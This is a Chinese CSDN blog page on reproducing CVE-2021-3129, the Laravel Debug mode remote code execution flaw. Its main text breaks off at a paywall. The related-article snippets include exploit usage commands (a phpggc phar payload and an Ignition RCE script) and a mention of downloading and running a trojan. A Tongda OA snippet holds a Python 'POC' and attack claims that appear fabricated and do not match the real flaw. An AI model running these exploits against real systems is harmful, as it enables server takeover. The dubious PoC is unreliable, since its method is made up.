【漏洞复现】CVE-2021-3129 Laravel Debug mode 远程代码执行漏洞

最新推荐文章于 2025-04-22 00:15:00 发布
最新推荐文章于 2025-04-22 00:15:00 发布
阅读量1.5w 收藏 27
点赞数 4
分类专栏: 漏洞复现 文章标签: php laravel web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46944519/article/details/123241080
版权

文章目录

声明

仅供安全研究和技术学习,切勿用于非法用途,切记!

前言

Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework),旨在实现的Web软件的MVC架构,它可以让开发者从面条一样杂乱的代码中解脱出来,帮助构建一个完美的网络APP,而且每行代码都可以简洁、富于表达力。

在Laravel中已经具有了一套高级的PHP ActiveRecord实现 – Eloquent ORM。它能方便的将“约束(constraints)”应用到关系的双方,这样开发者就具有了对数据的完全控制,而且享受到ActiveRecord的所有便利。Eloquent原生支持Fluent中查询构造器(query-builder)的所有方法。

一、漏洞简介

当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_p

了解本专栏 订阅专栏 解锁全文 超级会员免费看
Laravel Debug mode 远程代码执行CVE-2021-3129
jammny
01-30 3957
漏洞详情 Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行漏洞影响 Laravel <= 8.4.2 Ignition <= 2.5.1 漏洞利用 下载靶场:gi
CVE-2021-3129 Laravel Debug mode 远程代码执行漏洞复现
m0_56642842的博客
07-13 939
0x00 简介 Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework),旨在实现的Web软件的MVC架构,它可以让开发者从面条一样杂乱的代码中解脱出来,帮助构建一个完美的网络APP,而且每行代码都可以简洁、富于表达力。 在Laravel中已经具有了一套高级的PHP ActiveRecord实现 – Eloquent ORM。它能方便的将“约束(constraints)”应用到关系的双方,这样开发者就具有了对数据的完全控制,而且享受到ActiveRecord的所有便利。E
漏洞复现CVE-2024-38856(ApacheOfbiz RCE)
最新发布
blackpeach的博客
04-22 774
ApacheOfbiz RCE 漏洞复现,Groovy 表达式注入
laravel-exploits:针对CVE-2021-3129漏洞利用
05-25
laravel漏洞 漏洞利用CVE-2021-3129详细信息: ://www.ambionics.io/blog/laravel-debug-rce 用法 $ php -d ' phar.readonly=0 ' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id $ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log Logs cleared Successfully converted to PHAR ! Phar deserialized -----------
Laravel 远程代码执行漏洞(CVE-2021-3129)复现
oiadkt的博客
04-24 6672
Laravel 远程代码执行漏洞(CVE-2021-3129)
Laravel Debug mode 远程代码执行漏洞(CVE-2021-3129 )
qq_73767109的博客
07-03 1610
Laravel < 8.4.3可以实现日志利用造成phar反序列化。
CVE-2021-3129Laravel远程代码漏洞复现分析
华为云官方博客
03-17 7307
本文主要为大家带来CVE-2021-3129漏洞复现分析,为大家在日常工作中提供帮助。
再谈Laravel Debug mode RCE(CVE-2021-3129漏洞
wangluoanquan111的博客
08-10 3864
Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。2021年01月12日,Laravel被披露存在一个远程代码执行漏洞CVE-2021-3129)。当Laravel开启了Debug模式时,由于Laravel自带的Ignition组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行
Laravel Debug mode 远程代码执行漏洞CVE-2021-3129复现
weixin_47531489的博客
07-20 2620
1 简介 Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。它可以让你从面条一样杂乱的代码中解脱出来;它可以帮你构建一个完美的网络APP,而且每行代码都可以简洁、富于表达力。 2 漏洞概述 当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程
Laravel Debug mode RCE(CVE-2021-3129漏洞复现
m0_48520508的博客
02-19 1543
0x00简介 Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。它可以让你从面条一样杂乱的代码中解脱出来;它可以帮你构建一个完美的网络APP,而且每行代码都可以简洁、富于表达力。 0x01漏洞概述 当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远
----已搬运------浅入深出 Fastcgi 协议分析与 PHP-FPM 攻击方法--------学习子自大佬的教程 ftp那里没做完
Zero_Adam的博客
06-12 7143
目录:0. 前面的一些基础知识,从中摘抄的一些。1.利用 fcgi_exp.go 攻击使用条件:2. 本地实验:2.利用 phith0n 大神的 fpm.py3.SSRF 中对 FPM/FastCGI 的攻击使用条件:2. 本地实验:4. FTP - SSRF 攻击 FPM/FastCGI 学习自:WHOAMI大佬的。 过程中有报错,也能够解决了。很棒很棒的教程。!!! 0. 前面的一些基础知识,从中摘抄的一些。 Fastcgi是一个通信协议,和HTTP协议一样,进行数据交换的一个通道。 默认php-fpm
larasploit:Laravel自动漏洞扫描程序
03-18
去做 Laravel指纹 Laravel Leak .env Laravel调试模式 Laravel CVE-2018-15133 Laravel点火 APP_KEY不安全的反序列化已泄漏 安装 克隆回购 git clone https://github.com/carlosevieira/larasploit 跑 cd larasploit python3 larasploit.py
CVE-2021-3129远程执行代码漏洞复现
weixin_48085856的博客
02-06 1670
CVE-2021-3129远程执行代码漏洞 Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行
漏洞复现| Laravel Debug mode RCE(CVE-2021-3129
qq_42570883的博客
02-05 5430
漏洞名称】 Laravel Debug mode RCE(CVE-2021-3129) 【漏洞详情】 近日,国外某安全研究团队披露了 Laravel <= 8.4.2 存在远程代码执行漏洞。当Laravel开启了Debug模式时,由于Laravel自带的Ignition功能的某些接口存在过滤不严,攻击者可以发起恶意请求,通过构造恶意Log文件等方式触发Phar反序列化,从而造成远程代码执行,控制服务器。漏洞细节已在互联网公开。 【漏洞编号】 CVE-2021-3129 【验证工具】 https://
Laravel RCE(CVE-2021-3129复现
m0_64815693的博客
01-27 2770
CVE-2021-3129漏洞复现 Laravel Debug mode RCE
复现CVE-2021-3129
m0_67795959的博客
11-07 732
CVE-2021-3129Laravel 框架中的一个远程代码执行漏洞,当 Laravel 开启 Debug 模式时,由于 Laravel 自带的 Ignition 组件对。函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意 Log 文件等方式触发 Phar 反序列化,最终造成远程代码执行。www-data是服务用户,服务用户--------》普通用户--------》root超级管理员权限。下载CVE-2021-3129漏洞exp。利用exp远程下载木马并执行。查找可以提权的内核漏洞
Laravel RCE(CVE-2021-3129漏洞复现
深耕网络安全领域,聚焦护网行动(HW)、渗透测试、等级保护(等保)、CTF 竞赛四大核心方向,提供技术干货、实战经验与行业洞察。
07-13 3827
Laravel框架简介 Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。它可以让你从面条一样杂乱的代码中解脱出来;它可以帮你构建一个完美的网络APP,而且每行代码都可以简洁、富于表达力。 在Laravel中已经具有了一套高级的PHP ActiveRecord实现 – Eloquent ORM。它能方便的将“约束(constraints)”应用到关系的双方,这样你就具有了对数据的完全控制,而且享受到ActiveRecord的所有便利。Eloquent原生支持Flu
CVE-2021-3129漏洞复现-kali2020.4
weixin_43867542的博客
07-19 1774
漏洞名称:Facade Ignition for Laravel 授权问题漏洞 等级危害:超危 CVSS评分: 漏洞类型:授权问题 漏洞概述 Facade Ignition for Laravel是比利时Facade公司的一款运行在Laravel Web框架中的可自定义的错误页面。 Ignition for Laravel 2.5.2之前版本存在授权问题漏洞,该漏洞源于程序未进行正确的身份验证,攻击者可利用该漏洞执行任意代码。 受影响版本 Laravel <= 8.4.2;Igni
通达oa漏洞
03-25
### 关于通达OA系统的已知漏洞安全问题 #### 1. **Laravel Debug Mode RCE (CVE-2021-3129)** 通达OA系统基于Laravel框架开发,在某些版本中可能存在调试模式开启的情况。如果开发者未关闭调试功能,攻击者可以通过`/vendor/symfony/debug`路径触发远程代码执行(RCE),从而完全控制服务器[^1]。 #### 2. **文件上传漏洞** 通达OA允许用户上传附件,但在部分版本中缺乏严格的MIME类型校验机制。这可能导致恶意用户通过伪造图片文件(如PNG后缀附加`.php`脚本),绕过检测并成功上传可执行PHP代码到Web根目录下[^3]。例如,利用空字节漏洞构造如下文件名:`yjh.png%00.php`。 #### 3. **SQL注入风险** 早期版本的通达OA存在输入验证不足的问题,特别是在处理URL参数或表单数据时未能有效过滤特殊字符。这种设计缺陷可能被用来实施SQL注入攻击,窃取数据库敏感信息甚至篡改业务逻辑。 #### 4. **弱密码与默认账户隐患** 许多企业部署通达OA后并未更改初始管理员账号及其对应口令组合(比如admin/admin123!) ,使得外部威胁行为体能够轻易猜解登录凭证进而非法入侵内部网络资源。 以下是针对上述提到的一种典型RCE场景编写的一个简单Python POC示例: ```python import requests def exploit_laravel_debug_mode(url, cmd='whoami'): payload = f'{{"name":"debug","cmd":"{cmd}"}}' headers = {"Content-Type": "application/json"} try: response = requests.post(f"{url}/vendor/symfony/debug", data=payload, headers=headers) if 'result' in response.json(): print("[+] Command executed successfully!") print(response.json()['result']) else: print("[-] Failed to execute command.") except Exception as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": target_url = input("Enter the URL of the target system:") exploit_laravel_debug_mode(target_url) ``` 此脚本仅用于合法渗透测试目的,请勿滥用! --- ###
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李火火安全阁

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值